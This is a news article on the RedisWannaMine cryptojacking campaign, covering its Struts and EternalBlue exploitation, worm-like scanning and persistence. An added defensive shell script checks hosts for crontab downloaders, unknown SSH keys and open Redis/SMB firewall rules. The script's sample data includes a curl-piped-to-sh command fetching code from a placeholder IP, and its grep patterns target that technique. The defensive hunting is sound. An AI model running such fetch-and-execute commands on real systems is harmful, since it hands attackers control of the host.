Cryptojacking attack uses leaked EternalBlue NSA exploit to infect servers

RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.
Written by Charlie Osborne, Contributing Writer

Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.

On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.

The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and "demonstrates a worm-like behavior combined with advanced exploits to increase the attackers' infection rate and fatten their [operator] wallets."

When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.

If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.

This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.

However, the downloader is more sophisticated than usual: it also establishes persistence through new crontab entries, and secures continued remote access to the victim machine by adding attacker-controlled SSH keys to the authorized_keys file and modifying the system's iptables rules.

Other packages are also installed using standard Linux package managers, and the payload additionally includes masscan, an open-source TCP port scanner hosted on GitHub.

The attack script then launches a process called redisscan, which utilizes masscan to discover and infect vulnerable Redis servers. A process which follows is called ebscan, and this process uses masscan for a different purpose -- to discover and infect publicly-available Windows servers that are vulnerable to EternalBlue.
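The three persistence and access artefacts described above (crontab downloader jobs, new authorized_keys entries, loosened iptables rules) and the two ports the scanners hunt for (Redis on 6379, SMB on 445) are what a defender would check a Linux host for. The script below is an added example, not code from the article, from Imperva's report or from the RedisWannaMine downloader itself; the grep patterns, the baseline-snapshot approach for SSH keys and the sample files it builds are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added hunting script (not from the article or the malware it describes):
# checks a Linux host for the persistence/access artefacts attributed to the
# RedisWannaMine downloader. Patterns and samples are illustrative assumptions.

# 1. Crontab: jobs that fetch remote content and pipe it into a shell, or
#    decode an embedded base64 blob. Prints matches; exit 1 if none.
suspicious_cron_entries() {        # $1 = crontab file
    grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)' "$1"
}

# 2. SSH: keys in the live authorized_keys that are absent from a baseline
#    snapshot taken at provisioning time (exact whole-line comparison).
new_ssh_keys() {                   # $1 = baseline file, $2 = live file
    grep -vxF -f "$1" "$2" | grep -v '^[[:space:]]*$'
}

# 3. Firewall: iptables-save lines that accept all INPUT traffic or open
#    Redis (6379) / SMB (445) to anyone, i.e. what redisscan/ebscan look for.
permissive_firewall_rules() {      # $1 = iptables-save dump
    grep -E '^:INPUT ACCEPT|^-A INPUT( -p tcp)? -j ACCEPT$|--dport (6379|445) .*-j ACCEPT' "$1"
}

# Constructed sample inputs (not real captures) so the script runs offline.
build_samples() {                  # $1 = directory to write into
    cat > "$1/crontab" <<'EOF'
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://198.51.100.10/x.sh | sh
EOF
    printf 'ssh-ed25519 AAAAC3admin admin@bastion\n' > "$1/keys.baseline"
    cat > "$1/keys.live" <<'EOF'
ssh-ed25519 AAAAC3admin admin@bastion
ssh-rsa AAAAB3attacker
EOF
    cat > "$1/iptables.dump" <<'EOF'
*filter
:INPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6379 -j ACCEPT
COMMIT
EOF
}

# Run all three checks against a directory holding the four files above.
# On a real host you would point these at /var/spool/cron/*, /etc/cron.d/*,
# ~/.ssh/authorized_keys and the output of `iptables-save` instead.
hunt() {                           # $1 = directory with sample files
    echo "== crontab downloader jobs =="
    suspicious_cron_entries "$1/crontab" || echo "(none)"
    echo "== SSH keys not in baseline =="
    new_ssh_keys "$1/keys.baseline" "$1/keys.live" || echo "(none)"
    echo "== permissive firewall rules =="
    permissive_firewall_rules "$1/iptables.dump" || echo "(none)"
}

# Stand-alone run against the constructed samples.
dir=$(mktemp -d)
build_samples "$dir"
hunt "$dir"
rm -rf "$dir"
```

The baseline comparison for SSH keys is deliberately an exact-line match: a comment or option prefix on a known key would otherwise let an attacker's appended key blend in with a fuzzier check. Each function exits non-zero when it finds nothing, so the checks compose with `||` in a cron job or a configuration-management run.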

EternalBlue is an exploit developed by the US National Security Agency (NSA), leaked by the Shadow Brokers threat group in 2017.

The now infamous exploit was used to conduct the WannaCry ransomware campaign which crippled organizations worldwide last year, and it has been added to many a threat actor's toolbox ever since.

If the exploit successfully compromises a server, the attack script drops the admissioninit.exe payload, a cryptocurrency miner that mines virtual coins and deposits the funds in a wallet controlled by the attackers.

While Imperva has not revealed the scope of the attack or how many vulnerable systems may have been exploited, the attack highlights one thing: if IT admins do not patch their systems against such well-known exploits, cyberattackers will take advantage of the failure to line their own pockets.

See also: Ad network circumvents blockers to hijack browsers for cryptocurrency mining

Earlier this month, researchers discovered an advertising network which was able to circumvent ad-blockers to serve website visitors cryptojacking scripts.


Previous and related coverage

Tesla cloud systems exploited by hackers to mine cryptocurrency

Updated: Researchers have discovered that Tesla's AWS cloud systems were compromised for the purpose of cryptojacking.

UK government websites, ICO hijacked by cryptocurrency mining malware

US and Australian government domains were also affected by the bold cryptojacking scheme.

TechRepublic: Hackers can now hide cryptojacking scripts in Microsoft Word documents

Scripts hidden in Word's Online Video feature are being used to mine the Monero cryptocurrency.
